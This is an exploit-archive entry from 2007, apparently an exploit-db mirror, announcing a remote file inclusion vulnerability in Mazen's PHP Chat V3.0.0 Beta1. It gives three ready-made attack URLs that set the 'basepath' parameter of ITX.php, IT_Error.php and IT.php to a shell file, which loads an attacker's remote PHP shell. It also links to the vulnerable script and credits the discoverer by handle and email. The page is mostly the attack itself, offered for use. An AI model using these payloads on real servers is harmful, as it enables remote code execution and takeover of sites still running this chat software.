[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Mazens PHP Chat V3 (basepath) Remote File Inclusion Vulnerabilities
# Published : 2007-05-26
# Author : ThE TiGeR
# Previous Title : Fundanemt <= 2.2.0 (spellcheck.php) Remote Code Execution Exploit
# Next Title : TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability


#Mazen's PHP Chat V3.0.0 Beta1 Remote file inclusion

#Download script : http://www.scriptbrasil.com.br/script/php/bate_papo/mazen_phpopenchmt221.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# www.Syue.com [2007-05-26]